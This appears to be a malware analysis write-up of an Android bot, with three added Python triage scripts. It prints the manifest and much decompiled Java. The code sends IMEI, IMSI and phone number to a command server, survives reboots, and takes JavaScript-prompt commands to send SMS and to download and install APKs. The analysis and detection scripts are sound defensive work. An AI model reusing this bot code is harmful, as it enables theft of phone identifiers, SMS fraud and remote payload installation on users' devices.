Analysis report for sample 83c4aa1deb06060db6fae4e13630ed18c6ebe6babc187443b5f4c265c2ee074f
1. This is
2. AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="tp5x.WGt12"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="4" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<application android:label="@string/app_name" android:icon="@drawable/icon">
<activity android:label="@string/app_name" android:name=".Y6Cg03N">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="ru.alpha.WebActivity" />
<activity android:name="ru.alpha.HtmlActivity" />
<receiver android:name="ru.alpha.AlphaReceiver" />
<receiver android:name="BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<service android:name="ru.alpha.AlphaService">
<intent-filter>
<action android:name="ru.alpha.AlphaServiceStart76" />
</intent-filter>
</service>
</application>
</manifest>
The entries marked in red are the key ones: Y6Cg03N is responsible for starting the main UI and the other services, and BootReceiver for starting the bot at boot.
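A small manifest triage script, added here as an example (not part of the original post or of the sample), that turns the reading above into a repeatable check. It parses a decoded manifest (binary AXML must first be decoded, e.g. with apktool), deduplicates the permission list, flags the SMS/install/boot-persistence combination, resolves component names relative to the package and lists receivers registered for BOOT_COMPLETED and any non-standard intent actions. The manifest embedded below is the one quoted above; the RISKY set and the verdict labels are this example's own choices.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# The manifest recovered from the sample discussed in the report above.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="tp5x.WGt12"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="4" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<application android:label="@string/app_name" android:icon="@drawable/icon">
<activity android:label="@string/app_name" android:name=".Y6Cg03N">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="ru.alpha.WebActivity" />
<activity android:name="ru.alpha.HtmlActivity" />
<receiver android:name="ru.alpha.AlphaReceiver" />
<receiver android:name="BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<service android:name="ru.alpha.AlphaService">
<intent-filter>
<action android:name="ru.alpha.AlphaServiceStart76" />
</intent-filter>
</service>
</application>
</manifest>
"""

# Example's own choice: permissions that together characterise an SMS-sending,
# self-updating, boot-persistent bot like the one analysed here.
RISKY = {
    "android.permission.SEND_SMS",
    "android.permission.INSTALL_PACKAGES",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_PHONE_STATE",
    "android.permission.INTERNET",
}


def _name(el):
    return el.get(ANDROID_NS + "name", "")


def resolve_class(package, name):
    """Expand a component name as the build tools do: a leading '.' or a bare
    name is relative to the manifest package, a dotted name is absolute."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def triage(xml_text):
    """Summarise the manifest's permissions and components for an analyst."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    package = root.get("package", "")
    seen, unique, dupes = set(), [], []
    for p in (_name(e) for e in root.findall("uses-permission")):
        (dupes if p in seen else unique).append(p)
        seen.add(p)
    components = []
    for kind in ("activity", "receiver", "service"):
        for el in root.find("application").findall(kind):
            actions = [_name(a) for a in el.iter("action")]
            components.append((kind, resolve_class(package, _name(el)), actions))
    boot = [c for k, c, acts in components
            if k == "receiver" and "android.intent.action.BOOT_COMPLETED" in acts]
    return {
        "package": package,
        "permissions": unique,
        "duplicate_permissions": dupes,
        "risky_permissions": sorted(RISKY & set(unique)),
        "boot_receivers": boot,
        "services": [c for k, c, _ in components if k == "service"],
        # custom actions are how this sample wires its receiver to its service
        "custom_actions": sorted(a for _, _, acts in components for a in acts
                                 if not a.startswith("android.intent.action.")),
        "verdict": "suspicious" if RISKY <= set(unique) and boot else "review",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The duplicate ACCESS_NETWORK_STATE entry and the bare `BootReceiver` name (which resolves into the `tp5x.WGt12` package rather than `ru.alpha`) are the kind of detail a manual read skips but a parser reports consistently across many samples.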
3. Y6Cg03N.java
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
try
{
Class localClass = Class.forName("ru.alpha.Alpha");
Class[] arrayOfClass = new Class[3];
arrayOfClass[0] = Class.forName("android.content.Context");
arrayOfClass[1] = Class.forName("java.lang.String");
arrayOfClass[2] = Class.forName("java.lang.String");
Constructor localConstructor = localClass.getConstructor(arrayOfClass);
Object[] arrayOfObject = new Object[3];
arrayOfObject[0] = getApplicationContext();
arrayOfObject[1] = "mapk01_20f";
arrayOfObject[2] = "76";
localConstructor.newInstance(arrayOfObject);
i = 0;
if (i < 3);
}
catch (Exception localException2)
{
try
{
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("load", new Class[0]).invoke(this, new Object[0]);
localSharedPreferences = getSharedPreferences("settings", 1);
if (localSharedPreferences.getBoolean("created", false))
if (!secondStart)
finish();
}
catch (Exception localException2)
{
try
{
while (true)
{
int i;
SharedPreferences localSharedPreferences;
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("showScreen", new Class[0]).invoke(this, new Object[0]);
return;
localException1 = localException1;
localException1.printStackTrace();
continue;
titles.add("");
texts.add("");
i++;
continue;
localException2 = localException2;
localException2.printStackTrace();
continue;
SharedPreferences.Editor localEditor = localSharedPreferences.edit();
localEditor.putBoolean("created", true);
localEditor.commit();
}
}
catch (Exception localException3)
{
while (true)
localException3.printStackTrace();
}
}
}
}
In onCreate, the main thing invoked is a constructor of ru.alpha.Alpha:
public Alpha(Context paramContext, String paramString1, String paramString2)
where paramString1 = "mapk01_20f" and paramString2 = "76".
Alpha's constructor:
public Alpha(Context paramContext, String paramString1, String paramString2)
{
System.out.println("Alpha START");
try
{
apiKey = paramString1;
appId = paramString2;
SharedPreferences.Editor localEditor = paramContext.getSharedPreferences(Constants.SETTINGS, 2).edit();
localEditor.putString(Constants.APP_ID, paramString2);
localEditor.putString(Constants.API_KEY, paramString1);
localEditor.commit();
imei = Functions.getImei(paramContext);
imsi = Functions.getImsi(paramContext);
phone = Functions.getPhone(paramContext);
startTimer(paramContext);
createShortcut(paramContext);
return;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
From the constructor we can see that the parameters passed in earlier are probably used to tell apps apart; in other words, this malicious code may have infected or been built into several versions, which need to be controlled and distinguished by parameter. The code that follows to obtain the IMEI, IMSI and phone number is boilerplate, so I won't go into it.
Next, the startTimer method:
public static void startTimer(Context paramContext)
{
long l1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getLong(Constants.NEXT_TIME, 0L);
long l2 = System.currentTimeMillis();
long l3 = l1 - l2;
System.out.println("appId: " + appId);
System.out.println("apiKey: " + apiKey);
System.out.println("imei: " + imei);
System.out.println("imsi: " + imsi);
System.out.println("phone: " + phone);
Intent localIntent = new Intent(paramContext, AlphaReceiver.class);
localIntent.setAction(Constants.NOTIFICATION_ACTION);
localIntent.putExtra(Constants.APP_ID, appId);
localIntent.putExtra(Constants.API_KEY, apiKey);
localIntent.putExtra(Constants.IMEI, imei);
localIntent.putExtra(Constants.IMSI, imsi);
localIntent.putExtra(Constants.PHONE, phone);
PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, localIntent, 0);
AlarmManager localAlarmManager = (AlarmManager)paramContext.getSystemService("alarm");
System.out.println("offset: " + l3);
if (l3 > 0L)
localAlarmManager.set(0, l1, localPendingIntent);
while (true)
{
System.out.println("Alpha Timer START");
return;
localAlarmManager.set(0, l2 + Constants.MINUTE, localPendingIntent);
}
}
The key part of this method is that it packs the phone information read earlier into Extras and then uses a PendingIntent to deliver it to the AlphaReceiver class, with the action NOTIFICATION_ACTION.
public class AlphaReceiver extends BroadcastReceiver
{
public void onReceive(Context paramContext, Intent paramIntent)
{
System.out.println("AlphaService START");
System.out.println("intent.getAction(): " + paramIntent.getAction());
if ((!paramIntent.getAction().equals(Constants.NOTIFICATION_ACTION)) || (Functions.checkInternetConnection(paramContext)));
try
{
String str1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getString(Constants.APP_ID, "");
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
Intent localIntent = new Intent();
// Constants.SERVICE = ru.alpha.AlphaServiceStart
localIntent.setAction(Constants.SERVICE + str1);
localIntent.putExtra(Constants.APP_ID, str1);
localIntent.putExtra(Constants.API_KEY, str2);
localIntent.putExtra(Constants.IMEI, str3);
localIntent.putExtra(Constants.IMSI, str4);
localIntent.putExtra(Constants.PHONE, str5);
localIntent.putExtra(Constants.TYPE, Constants.NOTIFICATION_TYPE);
paramContext.startService(localIntent);
while (true)
{
label352: return;
Alpha.startTimer(paramContext);
}
}
catch (Exception localException)
{
break label352;
}
}
}
This starts AlphaService:
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
try
{
System.out.println("AlphaService START");
// check the network connection
System.out.println("checkInternetConnection: " + Functions.checkInternetConnection(this));
if (Functions.checkInternetConnection(this))
{
System.out.println("intent.getAction(): " + paramIntent.getAction());
String str1 = paramIntent.getStringExtra(Constants.APP_ID);
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
// sends these parameters to the server. Constants.SERVER = "http://m-001.net/index.php"
ServerResponse localServerResponse = Alpha.sendRequest(str2, str1, str3, str4, str5);
localServerResponse.printToOutStream();
Alpha.setNextTimeConnect(this, System.currentTimeMillis() + localServerResponse.wait * Constants.SECOND);
Alpha.startTimer(this);
if ((localServerResponse.notificationText.length() > 0) && (localServerResponse.notificationUrl.length() > 0))
// launches WebActivity depending on the returned result
Alpha.showNotification(this, localServerResponse.notificationTickerText, localServerResponse.notificationTitle, localServerResponse.notificationText, localServerResponse.notificationIcon, localServerResponse.notificationUrl, WebActivity.class);
if (localServerResponse.openUrl.length() > 0)
Alpha.openUrl(this, localServerResponse.openUrl);
if (localServerResponse.showHtml.length() > 0)
Alpha.showHtml(this, new String(Base64.decode(localServerResponse.showHtml), "UTF-8"));
}
return;
}
catch (Exception localException)
{
while (true)
{
localException.printStackTrace();
stopSelf(paramInt);
}
}
finally
{
stopSelf(paramInt);
}
throw localObject;
}
The code that launches WebActivity:
public class WebActivity extends Activity
{
static AlphaApi api;
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setTitle("");
api = new AlphaApi(this);
WebView localWebView = new WebView(this);
localWebView.getSettings().setJavaScriptEnabled(true);
localWebView.setWebChromeClient(new WebChromeClient()
{
// key code
public boolean onJsPrompt(WebView paramWebView, String paramString1, String paramString2, String paramString3, JsPromptResult paramJsPromptResult)
{
AlphaApiResult localAlphaApiResult = WebActivity.api.textToCommand(paramString2, paramString3);
if (localAlphaApiResult.find)
paramJsPromptResult.confirm(localAlphaApiResult.result);
for (int i = 1; ; i = 0)
return i;
}
});
localWebView.addJavascriptInterface(api, "alpha");
localWebView.clearCache(true);
localWebView.setScrollBarStyle(33554432);
String str = getIntent().getStringExtra("url");
System.out.println("url: " + str);
localWebView.loadUrl(str);
setContentView(localWebView);
((NotificationManager)getSystemService("notification")).cancelAll();
}
}
Here the notificationUrl from the returned response is used to open a browser view. WebActivity.api is an instance of the AlphaApi class, the key class: it is the one that executes the control commands. It works by watching the page's prompt events and using the prompt's parameters to implement the bot's control commands.
The key method of the AlphaApi class:
public AlphaApiResult textToCommand(String paramString1, String paramString2)
{
do
{
try
{
if (paramString1.equals("alpha.sendSms"))
{
String[] arrayOfString2 = paramString2.split("\\|");
// if the prompt parameter is alpha.sendSms, send an SMS
localAlphaApiResult = new AlphaApiResult(true, String.valueOf(sendSms(arrayOfString2[0], arrayOfString2[1])));
break;
}
// download and install the specified apk: a non-root backdoor install
if (paramString1.equals("alpha.install"))
{
String[] arrayOfString1 = paramString2.split("\\|");
install(arrayOfString1[0], arrayOfString1[1], arrayOfString1[2]);
localAlphaApiResult = new AlphaApiResult(true, "");
}
}
catch (Exception localException)
{
localException.printStackTrace();
localAlphaApiResult = new AlphaApiResult(false, "");
}
if (paramString1.equals("alpha.getGsm"))
{
localAlphaApiResult = new AlphaApiResult(true, getGsm());
break;
}
if (paramString1.equals("alpha.getImei"))
{
localAlphaApiResult = new AlphaApiResult(true, getImei());
break;
}
if (!paramString1.equals("alpha.getImsi"))
continue;
localAlphaApiResult = new AlphaApiResult(true, getImsi());
break;
}
while (!paramString1.equals("alpha.getPhone"));
AlphaApiResult localAlphaApiResult = new AlphaApiResult(true, getPhone());
return localAlphaApiResult;
}
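The prompt-based dispatcher above defines a small protocol: the first prompt() string is the command name, the second is a `|`-separated argument list, and the return value of the prompt is the command's result. The following Python is an added example (not code from the post or the sample) of how an analyst would decode a captured log of such prompt() calls, for instance from a hooked onJsPrompt in a sandbox, into a readable command timeline that separates read-only identifier collection from the two commands that act on the device. The captured pairs are constructed for this example with placeholder arguments; the command table is reconstructed from textToCommand, and the category names and verdict strings are this example's own.

```python
from dataclasses import dataclass, field

# Command table reconstructed from textToCommand:
# name -> (effect, number of '|'-separated arguments the dispatcher indexes)
COMMANDS = {
    "alpha.getImei":  ("collect", 0),
    "alpha.getImsi":  ("collect", 0),
    "alpha.getPhone": ("collect", 0),
    "alpha.getGsm":   ("collect", 0),
    "alpha.sendSms":  ("act", 2),   # number|text
    "alpha.install":  ("act", 3),   # url|error message|third field
}

# Constructed sample: (message, defaultValue) pairs as a hooked onJsPrompt
# would log them for each window.prompt() call made by the control page.
# Argument values are placeholders, not real numbers or URLs.
CAPTURED_PROMPTS = [
    ("alpha.getImei", ""),
    ("alpha.getImsi", ""),
    ("alpha.getGsm", ""),
    ("alpha.sendSms", "PLACEHOLDER_NUMBER|PLACEHOLDER_TEXT"),
    ("alpha.sendSms", "PLACEHOLDER_NUMBER"),                       # text missing
    ("alpha.install", "http://placeholder.invalid/x.apk|Install failed|0"),
    ("alpha.notInTable", ""),                                      # unknown name
    ("Enter your name", "guest"),                                  # ordinary prompt
]


@dataclass
class Decoded:
    name: str
    category: str                      # "collect", "act" or "unknown"
    args: list = field(default_factory=list)
    well_formed: bool = False


def decode_prompt(message, default_value):
    """Interpret one prompt() pair the way the bot's dispatcher does.
    Returns None when the message is outside the bot's 'alpha.' namespace."""
    if not message.startswith("alpha."):
        return None
    # textToCommand splits the second string with split("\\|"); Java's split
    # drops trailing empty fields, so an empty default yields no arguments.
    args = default_value.split("|")
    while args and args[-1] == "":
        args.pop()
    category, expected = COMMANDS.get(message, ("unknown", None))
    # with fewer fields than the dispatcher indexes, the Java code throws and
    # the catch block reports find=false, so the command does not run
    well_formed = expected is not None and len(args) >= expected
    return Decoded(message, category, args, well_formed)


def summarize(prompts):
    """Turn a captured prompt log into an analyst-facing summary."""
    decoded = [decode_prompt(m, v) for m, v in prompts]
    commands = [d for d in decoded if d is not None]
    acted = [d for d in commands if d.category == "act" and d.well_formed]
    return {
        "plain_prompts": decoded.count(None),
        "collect": [d.name for d in commands if d.category == "collect"],
        "actions": [(d.name, d.args) for d in acted],
        "malformed": [d.name for d in commands
                      if d.category != "unknown" and not d.well_formed],
        "unknown": [d.name for d in commands if d.category == "unknown"],
        # one well-formed device-affecting command is enough to label the page
        "verdict": "control-page" if acted else "recon-only",
    }


if __name__ == "__main__":
    for key, value in summarize(CAPTURED_PROMPTS).items():
        print(f"{key}: {value}")
```

Because the channel rides on an ordinary WebView callback, network-level inspection of the page body is the practical detection point: a page whose JavaScript calls prompt() with `alpha.`-prefixed strings is the control page, regardless of which URL the first-stage server handed out.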
What the install method actually does:
public void threadOperationRun(int paramInt, Object paramObject)
{
String[] arrayOfString;
if (paramInt == 1)
{
arrayOfString = (String[])(String[])paramObject;
String str1 = System.currentTimeMillis() + ".apk";
String str2 = Environment.getExternalStorageDirectory() + "/download/";
if (!Functions.downloadFile(str2, arrayOfString[0], str1))
break label107;
this.progressDialog.dismiss();
Functions.installApk(this.context, str2 + str1);
}
while (true)
{
return;
label107: this.progressDialog.dismiss();
Toast localToast = Toast.makeText(this.context, arrayOfString[1], 1);
localToast.setGravity(17, 0, 0);
localToast.show();
}
}
The code of the Functions class:
public class Functions
{
public static boolean checkInternetConnection(Context paramContext)
{
int i = 0;
try
{
ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");
if ((localConnectivityManager.getActiveNetworkInfo() != null) && (localConnectivityManager.getActiveNetworkInfo().isAvailable()))
{
boolean bool = localConnectivityManager.getActiveNetworkInfo().isConnected();
if (bool)
i = 1;
}
label45: return i;
}
catch (Exception localException)
{
break label45;
}
}
public static boolean downloadFile(String paramString1, String paramString2, String paramString3)
{
int i = 1;
try
{
HttpURLConnection localHttpURLConnection = (HttpURLConnection)new URL(paramString2).openConnection();
localHttpURLConnection.setRequestMethod("GET");
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.connect();
File localFile = new File(paramString1);
localFile.mkdirs();
FileOutputStream localFileOutputStream = new FileOutputStream(new File(localFile, paramString3));
InputStream localInputStream = localHttpURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
while (true)
{
int j = localInputStream.read(arrayOfByte);
if (j == -1)
break;
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
}
catch (IOException localIOException)
{
i = 0;
}
return i;
}
public static String getGsmData(Context paramContext)
{
Object localObject = "";
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
String str1 = localTelephonyManager.getNetworkOperator();
int i = Integer.parseInt(str1.substring(0, 3));
int j = Integer.parseInt(str1.substring(3));
GsmCellLocation localGsmCellLocation = (GsmCellLocation)localTelephonyManager.getCellLocation();
int k = localGsmCellLocation.getLac();
int m = localGsmCellLocation.getCid();
String str2 = i + ", " + j + ", " + k + ", " + m;
localObject = str2;
return localObject;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
public static String getImei(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getDeviceId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getImsi(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getSubscriberId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getPhone(Context paramContext)
{
String str;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
str = "";
}
else
{
str = localTelephonyManager.getLine1Number();
if (str == null)
str = "";
}
}
catch (Exception localException)
{
localException.printStackTrace();
str = "";
}
return str;
}
public static void installApk(Context paramContext, String paramString)
{
Intent localIntent = new Intent("android.intent.action.VIEW");
localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
paramContext.startActivity(localIntent);
}
public static boolean sendSms(String paramString1, String paramString2)
{
return false;
}
}
Summary: this Android bot has two notable traits. First, it makes heavy use of reflection to call functions, presumably to evade API-based detection, but not thoroughly enough: decrypting the API method names and class names dynamically would be a more complete approach. Second, its control commands are delivered in two stages: it first contacts a designated site to obtain the URL of the control-command page, then opens that URL, and the parameters of the JavaScript events on that page are used to invoke the bot's control commands, which is fairly distinctive.
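The first point of the summary, that the reflection here is easy to see through because every Class.forName and getMethod argument is a plaintext literal, can be checked mechanically. The script below is an added example (not from the post or the sample) of a static scan over decompiled Java: it recovers the reflected class and method names, distinguishes literal arguments from ones that would need runtime instrumentation to resolve, and flags the WebView/JS-bridge and APK-install indicators that make up the second trait. The source excerpt is constructed from lines quoted earlier in this report; the indicator tags are this example's own naming.

```python
import re

# Constructed sample: lines taken from the decompiled classes quoted above
# (Y6Cg03N.onCreate, WebActivity.onCreate, Functions.installApk), standing in
# for the full decompiler output an analyst would feed to scan().
DECOMPILED = r'''
Class localClass = Class.forName("ru.alpha.Alpha");
arrayOfClass[0] = Class.forName("android.content.Context");
arrayOfClass[1] = Class.forName("java.lang.String");
Constructor localConstructor = localClass.getConstructor(arrayOfClass);
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("load", new Class[0]).invoke(this, new Object[0]);
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("showScreen", new Class[0]).invoke(this, new Object[0]);
localWebView.getSettings().setJavaScriptEnabled(true);
public boolean onJsPrompt(WebView paramWebView, String paramString1, String paramString2, String paramString3, JsPromptResult paramJsPromptResult)
localWebView.addJavascriptInterface(api, "alpha");
localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
'''

FORNAME = re.compile(r'Class\.forName\(([^()]*)\)')
LITERAL = re.compile(r'^"([^"]*)"$')
GETMETHOD = re.compile(r'\.getMethod\("([^"]+)"')
JSBRIDGE = re.compile(r'addJavascriptInterface\(\s*\w+\s*,\s*"([^"]+)"')

# Source-level needles and the behaviour each one points at (example's own tags).
INDICATORS = [
    ("setJavaScriptEnabled(true)", "webview-js-enabled"),
    ("onJsPrompt(", "js-prompt-hook"),
    ("addJavascriptInterface(", "js-bridge"),
    ('"application/vnd.android.package-archive"', "apk-install-intent"),
]


def _unique(items):
    """Deduplicate while keeping first-seen order."""
    out = []
    for x in items:
        if x not in out:
            out.append(x)
    return out


def classify_forname_args(source):
    """Split Class.forName() arguments into plaintext literals (recoverable by
    grep) and anything else (needs a hook or debugger to resolve at runtime)."""
    literal, dynamic = [], []
    for arg in FORNAME.findall(source):
        arg = arg.strip()
        m = LITERAL.match(arg)
        if m:
            literal.append(m.group(1))
        else:
            dynamic.append(arg)
    return _unique(literal), _unique(dynamic)


def scan(source):
    """Collect reflection targets and behavioural indicators from decompiled source."""
    literal, dynamic = classify_forname_args(source)
    return {
        "reflected_classes": literal,
        "dynamic_class_loads": dynamic,
        "reflected_methods": _unique(GETMETHOD.findall(source)),
        "js_bridges": _unique(JSBRIDGE.findall(source)),
        "indicators": [tag for needle, tag in INDICATORS if needle in source],
    }


if __name__ == "__main__":
    for key, value in scan(DECOMPILED).items():
        print(f"{key}: {value}")
```

An empty `dynamic_class_loads` list is the concrete form of the summary's first observation: every reflected target is recoverable from the strings alone, so the reflection buys the sample nothing against a string-based signature.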